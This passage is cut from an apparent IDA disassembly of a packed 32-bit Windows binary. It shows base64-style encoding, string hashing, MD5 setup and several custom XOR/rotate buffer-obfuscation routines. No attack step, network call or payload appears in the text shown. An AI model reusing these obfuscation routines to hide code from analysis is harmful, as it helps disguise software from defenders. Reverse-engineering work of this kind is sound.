loc_40E8B6: ; CODE XREF: sub_40E618+284�j
cmp [ebp+var_88], 0
jnz short loc_40E8DA
mov eax, [ebp+var_1148]
add eax, [ebp+var_114C]
mov ecx, [ebp+var_114C]
mov al, [eax]
mov byte ptr [ebp+ecx+var_88+3], al
loc_40E8DA: ; CODE XREF: sub_40E618+2A5�j
mov eax, [ebp+var_1148]
add eax, [ebp+var_114C]
mov ecx, [ebp+var_114C]
mov al, [eax]
mov [ebp+ecx+var_1109], al
mov eax, [ebp+var_1148]
add eax, [ebp+var_114C]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40E90A
jmp short loc_40E90F
; ---------------------------------------------------------------------------
loc_40E90A: ; CODE XREF: sub_40E618+2EE�j
jmp loc_40E86D
; ---------------------------------------------------------------------------
loc_40E90F: ; CODE XREF: sub_40E618+26C�j
; sub_40E618+2F0�j
and [ebp+var_5], 0
and [ebp+var_1089], 0
lea eax, [ebp+var_118C]
push eax
lea eax, [ebp+var_1148]
push eax
lea eax, [ebp+var_1108]
push eax
lea eax, [ebp+var_84]
push eax
push [ebp+var_4]
call sub_40D871
add esp, 14h
locret_40E941: ; CODE XREF: sub_40E618:loc_40E686�j
leave
retn
sub_40E618 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E943 proc near ; CODE XREF: .packed:00416ABA�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_40E94E: ; CODE XREF: sub_40E943+32�j
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40E960
jmp short locret_40E977
; ---------------------------------------------------------------------------
loc_40E960: ; CODE XREF: sub_40E943+19�j
push [ebp+var_8]
call sub_407B5E
pop ecx
mov [ebp+var_4], eax
push [ebp+var_8]
call sub_40E618
pop ecx
jmp short loc_40E94E
; ---------------------------------------------------------------------------
locret_40E977: ; CODE XREF: sub_40E943+1B�j
leave
retn
sub_40E943 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E979 proc near ; CODE XREF: .packed:004168D5�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_40E98A
; ---------------------------------------------------------------------------
loc_40E983: ; CODE XREF: sub_40E979+24�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40E98A: ; CODE XREF: sub_40E979+8�j
cmp [ebp+var_4], 100h
jnb short loc_40E99F
mov eax, [ebp+var_4]
and byte_41EA40[eax], 0
jmp short loc_40E983
; ---------------------------------------------------------------------------
loc_40E99F: ; CODE XREF: sub_40E979+18�j
and [ebp+var_4], 0
jmp short loc_40E9AC
; ---------------------------------------------------------------------------
loc_40E9A5: ; CODE XREF: sub_40E979+4C�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40E9AC: ; CODE XREF: sub_40E979+2A�j
cmp [ebp+var_4], 40h
jnb short locret_40E9C7
mov eax, [ebp+var_4]
movzx eax, byte_41A18C[eax]
mov cl, byte ptr [ebp+var_4]
mov byte_41EA40[eax], cl
jmp short loc_40E9A5
; ---------------------------------------------------------------------------
locret_40E9C7: ; CODE XREF: sub_40E979+37�j
leave
retn
sub_40E979 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E9C9 proc near ; CODE XREF: sub_40A9CF+34C�p
; sub_40A9CF+E18�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 2
jnb short loc_40E9E8
xor eax, eax
jmp locret_40EB4C
; ---------------------------------------------------------------------------
loc_40E9E8: ; CODE XREF: sub_40E9C9+16�j
and [ebp+var_4], 0
and [ebp+var_8], 0
loc_40E9F0: ; CODE XREF: sub_40E9C9+17A�j
push 1
pop eax
test eax, eax
jz loc_40EB48
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
inc eax
cmp eax, [ebp+var_C]
jnb short loc_40EA29
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movzx eax, byte_41EA40[eax]
shl eax, 2
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov [ecx-1], al
jmp short loc_40EA2E
; ---------------------------------------------------------------------------
loc_40EA29: ; CODE XREF: sub_40E9C9+40�j
jmp loc_40EB48
; ---------------------------------------------------------------------------
loc_40EA2E: ; CODE XREF: sub_40E9C9+5E�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+var_C]
jnb short loc_40EA66
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movzx eax, byte_41EA40[eax]
sar eax, 4
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov cl, [ecx-1]
or cl, al
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
mov [eax-1], cl
jmp short loc_40EA6B
; ---------------------------------------------------------------------------
loc_40EA66: ; CODE XREF: sub_40E9C9+72�j
jmp loc_40EB48
; ---------------------------------------------------------------------------
loc_40EA6B: ; CODE XREF: sub_40E9C9+9B�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
inc eax
cmp eax, [ebp+var_C]
jnb short loc_40EA99
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movzx eax, byte_41EA40[eax]
shl eax, 4
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov [ecx-1], al
jmp short loc_40EA9E
; ---------------------------------------------------------------------------
loc_40EA99: ; CODE XREF: sub_40E9C9+B0�j
jmp loc_40EB48
; ---------------------------------------------------------------------------
loc_40EA9E: ; CODE XREF: sub_40E9C9+CE�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+var_C]
jnb short loc_40EAD6
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movzx eax, byte_41EA40[eax]
sar eax, 2
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov cl, [ecx-1]
or cl, al
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
mov [eax-1], cl
jmp short loc_40EAD8
; ---------------------------------------------------------------------------
loc_40EAD6: ; CODE XREF: sub_40E9C9+E2�j
jmp short loc_40EB48
; ---------------------------------------------------------------------------
loc_40EAD8: ; CODE XREF: sub_40E9C9+10B�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
inc eax
cmp eax, [ebp+var_C]
jnb short loc_40EB06
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movzx eax, byte_41EA40[eax]
shl eax, 6
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov [ecx-1], al
jmp short loc_40EB08
; ---------------------------------------------------------------------------
loc_40EB06: ; CODE XREF: sub_40E9C9+11D�j
jmp short loc_40EB48
; ---------------------------------------------------------------------------
loc_40EB08: ; CODE XREF: sub_40E9C9+13B�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+var_C]
jnb short loc_40EB3A
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov cl, [ecx-1]
or cl, byte_41EA40[eax]
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
mov [eax-1], cl
jmp short loc_40EB3C
; ---------------------------------------------------------------------------
loc_40EB3A: ; CODE XREF: sub_40E9C9+14C�j
jmp short loc_40EB48
; ---------------------------------------------------------------------------
loc_40EB3C: ; CODE XREF: sub_40E9C9+16F�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
jmp loc_40E9F0
; ---------------------------------------------------------------------------
loc_40EB48: ; CODE XREF: sub_40E9C9+2C�j
; sub_40E9C9:loc_40EA29�j ...
mov eax, [ebp+var_4]
dec eax
locret_40EB4C: ; CODE XREF: sub_40E9C9+1A�j
leave
retn
sub_40E9C9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EB4E proc near ; CODE XREF: sub_40A9CF+292�p
; sub_40A9CF+D12�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
and [ebp+var_4], 0
and [ebp+var_8], 0
and [ebp+var_C], 0
loc_40EB60: ; CODE XREF: sub_40EB4E:loc_40EC83�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movzx eax, byte ptr [eax]
sar eax, 2
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
shl eax, 4
and eax, 30h
mov [ebp+var_4], al
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_8]
jnz short loc_40EBC2
movzx eax, [ebp+var_4]
or al, 1
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
jmp loc_40EC88
; ---------------------------------------------------------------------------
loc_40EBC2: ; CODE XREF: sub_40EB4E+52�j
movzx eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
movzx ecx, byte ptr [ecx]
sar ecx, 4
and ecx, 0Fh
or eax, ecx
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
shl eax, 2
and eax, 3Ch
mov [ebp+var_4], al
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_8]
jnz short loc_40EC2A
movzx eax, [ebp+var_4]
or al, 1
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
jmp short loc_40EC88
; ---------------------------------------------------------------------------
loc_40EC2A: ; CODE XREF: sub_40EB4E+BD�j
movzx eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
movzx ecx, byte ptr [ecx]
sar ecx, 6
or eax, ecx
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movzx eax, byte ptr [eax]
and eax, 3Fh
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_8]
jnz short loc_40EC83
jmp short loc_40EC88
; ---------------------------------------------------------------------------
loc_40EC83: ; CODE XREF: sub_40EB4E+131�j
jmp loc_40EB60
; ---------------------------------------------------------------------------
loc_40EC88: ; CODE XREF: sub_40EB4E+6F�j
; sub_40EB4E+DA�j ...
mov eax, [ebp+arg_4]
add eax, [ebp+var_C]
and byte ptr [eax], 0
mov eax, [ebp+var_C]
leave
retn
sub_40EB4E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EC96 proc near ; CODE XREF: sub_40A9CF+2FA�p
; sub_40E618+FD�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_8], eax
and [ebp+var_4], 0
jmp short loc_40ECB4
; ---------------------------------------------------------------------------
loc_40ECAD: ; CODE XREF: sub_40EC96+3A�j
; sub_40EC96+4A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40ECB4: ; CODE XREF: sub_40EC96+15�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jge short loc_40ECE6
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
movzx eax, byte_41EA40[eax]
test eax, eax
jz short loc_40ECD2
jmp short loc_40ECAD
; ---------------------------------------------------------------------------
loc_40ECD2: ; CODE XREF: sub_40EC96+38�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 41h
jnz short loc_40ECE2
jmp short loc_40ECAD
; ---------------------------------------------------------------------------
loc_40ECE2: ; CODE XREF: sub_40EC96+48�j
xor eax, eax
jmp short locret_40ECE9
; ---------------------------------------------------------------------------
loc_40ECE6: ; CODE XREF: sub_40EC96+24�j
push 1
pop eax
locret_40ECE9: ; CODE XREF: sub_40EC96+4E�j
leave
retn
sub_40EC96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ECEB proc near ; CODE XREF: .packed:004168EF�p
var_58 = byte ptr -58h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 58h
push ebx
push esi
push edi
lea eax, [ebp+var_58]
push eax
call sub_40F11F
pop ecx
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_58]
push eax
call sub_40F159
add esp, 0Ch
lea eax, [ebp+var_58]
push eax
push offset byte_41EB44
call sub_40F26E
pop ecx
pop ecx
lea eax, byte_41EB44
push 10h
pop edx
loc_40ED29: ; CODE XREF: sub_40ECEB+46�j
mov cl, [eax]
rol cl, cl
mov [eax], cl
inc eax
dec edx
jnz short loc_40ED29
pop edi
pop esi
pop ebx
leave
retn
sub_40ECEB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ED38 proc near ; CODE XREF: sub_40A9CF+14�p
; sub_41113B+159�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
xor ecx, ecx
xor eax, eax
loc_40ED45: ; CODE XREF: sub_40ED38+2F�j
mov cl, [esi]
test ecx, ecx
jz short loc_40ED69
cmp ecx, 61h
jb short loc_40ED53
sub ecx, 20h
loc_40ED53: ; CODE XREF: sub_40ED38+16�j
and ecx, 7Fh
add eax, ecx
and ecx, 0Fh
mov cl, byte_41EB44[ecx]
add eax, ecx
rol eax, 3
inc esi
jmp short loc_40ED45
; ---------------------------------------------------------------------------
loc_40ED69: ; CODE XREF: sub_40ED38+11�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40ED38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ED6E proc near ; CODE XREF: .packed:004168FD�p
var_58 = byte ptr -58h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 58h
push ebx
push esi
push edi
lea eax, [ebp+var_58]
push eax
call sub_40F11F
pop ecx
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_58]
push eax
call sub_40F159
add esp, 0Ch
lea eax, [ebp+var_58]
push eax
push offset dword_41EB58
call sub_40F26E
pop ecx
pop ecx
lea esi, dword_41EB58
mov edi, esi
push 10h
pop ecx
loc_40EDAE: ; CODE XREF: sub_40ED6E+48�j
lodsb
xor al, 0AAh
add al, al
or al, 1
stosb
loop loc_40EDAE
pop edi
pop esi
pop ebx
leave
retn
sub_40ED6E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EDBD proc near ; CODE XREF: sub_40EF29+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_40EDCE
; ---------------------------------------------------------------------------
loc_40EDC7: ; CODE XREF: sub_40EDBD+AF�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40EDCE: ; CODE XREF: sub_40EDBD+8�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jge locret_40EE71
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
sub al, 33h
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
movzx eax, byte ptr [eax+edx]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov ecx, [ebp+arg_8]
mov al, [eax]
sub al, [ecx+edx]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
movzx eax, byte ptr [eax+edx]
not eax
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov cl, [ecx]
xor cl, al
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov [eax], cl
mov eax, [ebp+arg_4]
cdq
push 10h
pop ecx
idiv ecx
shl edx, 2
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
xor al, dl
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
add al, 1
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp loc_40EDC7
; ---------------------------------------------------------------------------
locret_40EE71: ; CODE XREF: sub_40EDBD+17�j
leave
retn
sub_40EDBD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EE73 proc near ; CODE XREF: sub_40EF41+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_40EE84
; ---------------------------------------------------------------------------
loc_40EE7D: ; CODE XREF: sub_40EE73+AF�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40EE84: ; CODE XREF: sub_40EE73+8�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jge locret_40EF27
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
sub al, 1
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+arg_4]
cdq
push 10h
pop ecx
idiv ecx
shl edx, 2
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
xor al, dl
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
movzx eax, byte ptr [eax+edx]
not eax
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov cl, [ecx]
xor cl, al
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov [eax], cl
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
movzx eax, byte ptr [eax+edx]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov ecx, [ebp+arg_8]
mov al, [eax]
add al, [ecx+edx]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
add al, 33h
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp loc_40EE7D
; ---------------------------------------------------------------------------
locret_40EF27: ; CODE XREF: sub_40EE73+17�j
leave
retn
sub_40EE73 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EF29 proc near ; CODE XREF: sub_40A9CF+25D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push offset dword_41EB58
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40EDBD
add esp, 0Ch
pop ebp
retn
sub_40EF29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EF41 proc near ; CODE XREF: sub_40A9CF+380�p
; sub_40D871+7AD�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push offset dword_41EB58
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40EE73
add esp, 0Ch
pop ebp
retn
sub_40EF41 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EF59 proc near ; CODE XREF: sub_40A9CF+271�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+arg_4]
push [ebp+arg_0]
mov eax, [ebp+arg_0]
add eax, 4
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
call sub_410422
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, 4
mov [ebp+arg_0], eax
and [ebp+var_8], 0
jmp short loc_40EF91
; ---------------------------------------------------------------------------
loc_40EF8A: ; CODE XREF: sub_40EF59+7E�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_40EF91: ; CODE XREF: sub_40EF59+2F�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jge short loc_40EFD9
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
add al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
xor al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
push 1
push [ebp+var_4]
call sub_416DF6 ; _rotl
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
jmp short loc_40EF8A
; ---------------------------------------------------------------------------
loc_40EFD9: ; CODE XREF: sub_40EF59+3E�j
mov eax, [ebp+arg_4]
dec eax
mov [ebp+var_8], eax
jmp short loc_40EFE9
; ---------------------------------------------------------------------------
loc_40EFE2: ; CODE XREF: sub_40EF59+D4�j
mov eax, [ebp+var_8]
dec eax
mov [ebp+var_8], eax
loc_40EFE9: ; CODE XREF: sub_40EF59+87�j
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_40F02F
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
add al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
xor al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
push 1
push [ebp+var_4]
call sub_416DF6 ; _rotl
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
jmp short loc_40EFE2
; ---------------------------------------------------------------------------
loc_40F02F: ; CODE XREF: sub_40EF59+94�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
mov [eax-4], ecx
mov eax, [ebp+arg_4]
add eax, 4
leave
retn
sub_40EF59 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F040 proc near ; CODE XREF: sub_40A9CF+366�p
; sub_40D871+792�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
mov eax, [eax]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
sub eax, 4
push eax
mov eax, [ebp+arg_0]
add eax, 4
push eax
push [ebp+arg_0]
call sub_416E02 ; memmove
add esp, 0Ch
mov eax, [ebp+arg_4]
sub eax, 4
mov [ebp+arg_4], eax
and [ebp+var_8], 0
jmp short loc_40F07C
; ---------------------------------------------------------------------------
loc_40F075: ; CODE XREF: sub_40F040+82�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_40F07C: ; CODE XREF: sub_40F040+33�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jge short loc_40F0C4
mov eax, [ebp+var_4]
sub eax, [ebp+var_8]
mov [ebp+var_4], eax
push 1
push [ebp+var_4]
call sub_416DFC ; _rotr
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
xor al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
sub al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
jmp short loc_40F075
; ---------------------------------------------------------------------------
loc_40F0C4: ; CODE XREF: sub_40F040+42�j
mov eax, [ebp+arg_4]
dec eax
mov [ebp+var_8], eax
jmp short loc_40F0D4
; ---------------------------------------------------------------------------
loc_40F0CD: ; CODE XREF: sub_40F040+D8�j
mov eax, [ebp+var_8]
dec eax
mov [ebp+var_8], eax
loc_40F0D4: ; CODE XREF: sub_40F040+8B�j
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_40F11A
mov eax, [ebp+var_4]
sub eax, [ebp+var_8]
mov [ebp+var_4], eax
push 1
push [ebp+var_4]
call sub_416DFC ; _rotr
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
xor al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
sub al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
jmp short loc_40F0CD
; ---------------------------------------------------------------------------
loc_40F11A: ; CODE XREF: sub_40F040+98�j
mov eax, [ebp+arg_4]
leave
retn
sub_40F040 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F11F proc near ; CODE XREF: sub_40ECEB+D�p
; sub_40ED6E+D�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov dword ptr [eax], 67452301h
mov eax, [ebp+arg_0]
mov dword ptr [eax+4], 0EFCDAB89h
mov eax, [ebp+arg_0]
mov dword ptr [eax+8], 98BADCFEh
mov eax, [ebp+arg_0]
mov dword ptr [eax+0Ch], 10325476h
mov eax, [ebp+arg_0]
and dword ptr [eax+10h], 0
mov eax, [ebp+arg_0]
and dword ptr [eax+14h], 0
pop ebp
retn
sub_40F11F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F159 proc near ; CODE XREF: sub_40ECEB+1D�p
; sub_40ED6E+1D�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
mov eax, [eax+10h]
mov [ebp+var_4], eax
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax*8]
mov ecx, [ebp+arg_0]
mov [ecx+10h], eax
mov eax, [ebp+arg_0]
mov eax, [eax+10h]
cmp eax, [ebp+var_4]
jnb short loc_40F18E
mov eax, [ebp+arg_0]
mov eax, [eax+14h]
inc eax
mov ecx, [ebp+arg_0]
mov [ecx+14h], eax
loc_40F18E: ; CODE XREF: sub_40F159+26�j
mov eax, [ebp+arg_8]
shr eax, 1Dh
mov ecx, [ebp+arg_0]
mov ecx, [ecx+14h]
add ecx, eax
mov eax, [ebp+arg_0]
mov [eax+14h], ecx
mov eax, [ebp+var_4]
shr eax, 3
and eax, 3Fh
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_40F21C
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
lea eax, [ecx+eax+18h]
mov [ebp+var_8], eax
push 40h
pop eax
sub eax, [ebp+var_4]
mov [ebp+var_4], eax
mov eax, [ebp+arg_8]
cmp eax, [ebp+var_4]
jnb short loc_40F1E8
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+var_8]
call sub_416B52 ; memcpy
add esp, 0Ch
jmp locret_40F26C
; ---------------------------------------------------------------------------
loc_40F1E8: ; CODE XREF: sub_40F159+77�j
push [ebp+var_4]
push [ebp+arg_4]
push [ebp+var_8]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
add eax, 18h
push eax
push [ebp+arg_0]
call sub_40F3CE
